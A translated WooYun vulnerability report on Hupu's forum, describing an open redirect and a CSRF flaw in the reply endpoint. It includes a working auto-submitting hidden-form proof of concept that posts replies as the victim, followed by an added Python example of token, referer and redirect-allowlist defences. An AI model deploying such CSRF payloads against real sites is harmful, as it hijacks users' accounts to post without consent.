Vulnerability summary (followers: 24)
Defect number: wooyun-2015-0110198
Vulnerability title: Hupu URL redirect + CSRF allows arbitrary spam replies
Related vendor: 虎扑体育网 (Hupu Sports)
Vulnerability author: 路人甲
Submitted: 2015-04-27 12:22
Fixed: 2015-04-27 12:45
Published: 2015-04-27 12:45
Vulnerability type: design flaw / logic error
Severity: low
Self-assessed rank: 1
Vulnerability status: vendor has been notified but ignored the vulnerability
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-04-27: details sent to the vendor, awaiting vendor handling
2015-04-27: vendor proactively ignored the vulnerability; details disclosed to the public
Brief description:
As in the title: I successfully got my roommate to spam-post.
Detailed description:
URL redirect: go.hupu.com/u?url=
CSRF: the bbs reply endpoint has no token and no referer check
So http://go.hupu.com/u?url=http://x.x.x.x/csrf.html may be more deceptive, since the link appears to point at hupu's own domain.
Proof of vulnerability:
<div id="bodyframe" style="VISIBILITY: hidden">
<form id="fastform" name="FORM" class="j_atc_content left" method="post" action="http://bbs.hupu.com/post.php?" onsubmit="textConvert('fastform', 'atc_content')">
<!-- Reply box -->
<div id="re" class="box"><div id="re_top"></div>
<div id="re_box">
<div class="left"><a class="headpic" href="http://my.hupu.com/19312932"><img width="45" height="45" src="http://i1.hoopchina.com.cn/user/default_small.jpg"></a><br> <a class="blue" style="" href="http://my.hupu.com/set.php?s=picture">更新头像</a></div>
<div class="input"><a id="j_face" class="face_button" title="点击选择你要添加的表情"> </a>
<div id="face_lable" class="face_img" style="display:none;overflow-y:scroll;"><div id="leftface" class="left"></div></div>
<textarea name="atc_content" id="atc_content" rows="8" style="height: 96px;" value="6666666666666"></textarea>
<div class="fb_pic" id="add_li_vote" style=" margin:-3px 8px 10px 0; display:none;">
<input name="usevote" id="usevote" type="hidden" value="0">
<input name="douid" id="usevote" type="hidden" value="1">
<input name="votetype" type="hidden" value="bbs">
<a href="javascript:;" id="del_vote" class="del" style="float:right"> </a><strong>添加投票</strong><br>
<span class="f666">投票主题:</span><input id="votetitle" name="votetitle" class="inputfile" style="border-top:1px solid #444;border-left:1px solid #444;width:400px;" type="text">
<div id="uppic1"><span class="f666">选项1:</span><input name="votename[]" type="text" class="inputfile"></div>
<div id="uppic2"><span class="f666">选项2:</span><input name="votename[]" type="text" class="inputfile"></div>
<div id="uppic3"><span class="f666">选项3:</span><input name="votename[]" type="text" class="inputfile"><a class="blue" onclick="delvotenoe('3')" href="javascript:;"> X </a></div>
<input name="editnum" type="hidden" id="editnum" value="3">
<input name="nowitnum" type="hidden" id="nowitnum" value="3">
<div id="addvote"></div>
<div class="f444" style="width:425px;"><span class="f666"> </span><div id="addvotenum"><a class="blue right" onclick="doadd(1)" href="javascript:;">+增加一项</a></div><label for="multiplevote"><input id="multiplevote" type="checkbox"> 允许多选</label><span style="display:none;">,最多可选<input name="voteclass" class="inputtext width60px" size="1" maxlength="2" value="">个</span></div>
</div>
<div class="right" style=""><label for="fbd_reply_note"><input name="fbd_reply_note" type="checkbox" value="1" id="fbd_reply_note">同步发布到<a class="blue" href="http://my.hupu.com/19312932/note">我的碎碎念</a></label></div>
<input name="postfast" type="hidden" value="2">
<input id="fastbtn" class="btns2" type="submit" value="回 复" title="按 Ctrl + Enter 可提交回复">
<span style="margin-left:20px;"><a id="p4" class="blue" href="javascript:;">添加投票</a></span>
<span id="adv_reply" style="margin-left:20px;"><a id="orz" class="blue" href="/post.php?action=reply&fid=1048&tid=12523690&replayofpage=">高级回复 ?</a></span>
</div>
<div class="clearfix"></div></div>
<div id="re_bottom"></div></div><!-- Reply box END -->
<input type="hidden" name="atc_title" value="Re:【赛后】快船加时107:111马刺 邓肯28分11板4助 莱昂纳德23分9板3助 米尔斯18分" size="65">
<input type="hidden" name="atc_usesign" value="1">
<input type="hidden" name="atc_convert" value="1">
<input type="hidden" name="atc_autourl" value="1">
<input type="hidden" value="2" name="step">
<input type="hidden" value="reply" name="action">
<input type="hidden" value="1048" name="fid">
<input type="hidden" value="12523690" name="tid">
<input type="hidden" value="【赛后】快船加时107:111马刺 邓肯28分11板4助 莱昂纳德23分9板3助 米尔斯18分" name="subject">
<input type="hidden" value="0" name="editor">
<input type="hidden" value="none" name="atc_attachment">
<input type="hidden" value="" name="replayofpage">
<input type="hidden" value="1" name="replaymeta">
</form>
</div>
<script>
document.getElementById("atc_content").value="老男人果然硬。。。。";
document.forms[0].submit();
</script>
Fix suggestions:
Add a CSRF token
Check the referer
Copyright notice: please credit the source when reposting, 路人甲@乌云
Vulnerability responses
Vendor response:
Severity: no impact, vendor ignored
Ignored at: 2015-04-27 12:45
Vendor reply:
Not bad, very attentive.
Latest status:
None yet
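Added example (not part of the report and not hupu's code) covering both the detailed description and the fix suggestions: the two server-side checks the report says post.php lacks (a session-bound CSRF token and an Origin/Referer check), plus a host allowlist for the go.hupu.com/u?url= redirect. Host names are taken from the report; the allowlist, the secret and the request data, which mirrors the hidden fields of the PoC form, are constructed for this example.

```python
import hashlib
import hmac
from typing import Dict, Optional, Tuple
from urllib.parse import urlparse

# Host names come from the report; the allowlist and secret are assumptions for this example.
SITE_HOST = "bbs.hupu.com"
ALLOWED_REDIRECT_HOSTS = {"bbs.hupu.com", "my.hupu.com", "www.hupu.com"}
SECRET = b"constructed-server-secret"

def issue_csrf_token(session_id: str, secret: bytes = SECRET) -> str:
    """Per-session token bound to the login session, to be embedded as a hidden form field."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()

def reply_request_is_legit(headers: Dict[str, str], form: Dict[str, str],
                           session_id: str, secret: bytes = SECRET) -> Tuple[bool, str]:
    """The two checks the report says post.php lacks: a CSRF token and a referer/origin check."""
    expected = issue_csrf_token(session_id, secret)
    if not hmac.compare_digest(form.get("csrf_token", ""), expected):
        return False, "missing or wrong csrf token"
    # Browsers send Origin on cross-site POSTs; fall back to Referer, and fail closed if neither.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "no Origin/Referer header"
    if urlparse(source).hostname != SITE_HOST:
        return False, "cross-site source: " + source
    return True, "ok"

def safe_redirect_target(url: str) -> Optional[str]:
    """For go.hupu.com/u?url=...: only follow http(s) targets on an allowlisted host."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_REDIRECT_HOSTS:
        return None
    return url

# Constructed requests: the fields mirror the hidden form in the PoC above.
POC_REQUEST = (
    {"Referer": "http://x.x.x.x/csrf.html"},            # attacker page submitting the form
    {"action": "reply", "fid": "1048", "tid": "12523690", "atc_content": "spam"},
)
LEGIT_REQUEST = (
    {"Origin": "http://bbs.hupu.com", "Referer": "http://bbs.hupu.com/12523690-last.html"},
    {"action": "reply", "fid": "1048", "tid": "12523690", "atc_content": "hi",
     "csrf_token": issue_csrf_token("session-of-roommate")},
)

if __name__ == "__main__":
    print(reply_request_is_legit(*POC_REQUEST, "session-of-roommate"))    # rejected
    print(reply_request_is_legit(*LEGIT_REQUEST, "session-of-roommate"))  # accepted
    print(safe_redirect_target("http://x.x.x.x/csrf.html"))               # None
```

The token check alone already defeats the hidden-form PoC; the Origin/Referer check is a second, independent layer, which is why it must fail closed when neither header is present.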